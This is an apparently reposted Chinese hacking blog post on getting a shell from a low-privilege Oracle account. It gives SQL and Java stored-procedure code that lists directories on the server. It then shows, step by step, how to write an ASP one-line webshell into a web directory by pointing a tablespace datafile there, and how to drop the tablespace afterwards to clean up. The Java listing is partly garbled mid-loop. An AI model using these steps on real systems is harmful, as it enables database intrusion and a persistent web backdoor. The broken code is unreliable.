oracle低权限下获取shell

转载请标明:http://hi.baidu.com/hack_forensic 《关于oracle列目录的可行性测试》 经过本人测试,确实可行,解决了 kj021320文章的遗憾,kj021320在文章<>最后说,当然这个方法缺点就是你要知道WEB路径.少费话,直接贴code: create global temporary table BLUEUSER.dirlist( filename varchar2(255), filesize number, filedate date) on commit delete rows; / create or replace and compile java source named DirList as import java.io.*; import java.sql.*; public class DirList { public static void getList(String directory) throws SQLException { File path=new File(directory); String[] fileList=path.list(); String fileName; long fileSize; long fileDate; for (int i=0;i exec BLUEUSER.p_get_dir_list(‘/tmp’); PL/SQL procedure successfully completed select * from BLUEUSER.dirlist; select * from BLUEUSER.dirlist where rownum<150; select filename from BLUEUSER.dirlist where rownum<150; select filename from BLUEUSER.dirlist; truncate table BLUEUSER.dirlist; 好啊 要不然是追加. 测试环境:oracle 9+redhat ——————ORACLE 建立数据文件WriteWebShell——————— SQLJ 存储过程写文件也可以，逼于无奈对方机器不支持SQLJ 还有 UTL_FILE包也被干掉了？ 那 也可以 使用以下我说的这个方式 SQL> create tablespace kjtest datafile ‘e:/website/kj.asp’ size 100k nologging ; 表空间已创建。 这里记住了 100K为ORACLE 表空间最小的单位，如果你的一句话SHELL比较大 那可以200K比较稳妥 但是最终建议一句话一定要最最简洁 SQL> CREATE TABLE WEBSHELL(C varchar2(100)) tablespace kjtest; 表已创建。 一般用 VARCHAR类型已经可以 ，表空间太小了 ，所以不可以 为 CLOB或者 BLOB类型。 SQL> insert into WEBSHELL values(‘<%execute request(“kj021320″)%>’); 已创建 1 行。 SQL> commit; 提交完成。 提交完成之后就 OK？ NO~ 因为数据还没有被 DBWn 进程刷到文件呢. 所以需要同步一下CKPT以及OFFLINE当前表空间 SQL> alter tablespace kjtest offline; 表空间已更改。 到这里 你的 一句话SHELL代码已经 写到 那个文件了 你会发现有这样的 <%execute request(“kj021320″)%>的 代码 一句话shell已经OK了 最后使用后记得吧 表空间删除 SQL> drop tablespace kjtest including contents; 表空间已删除。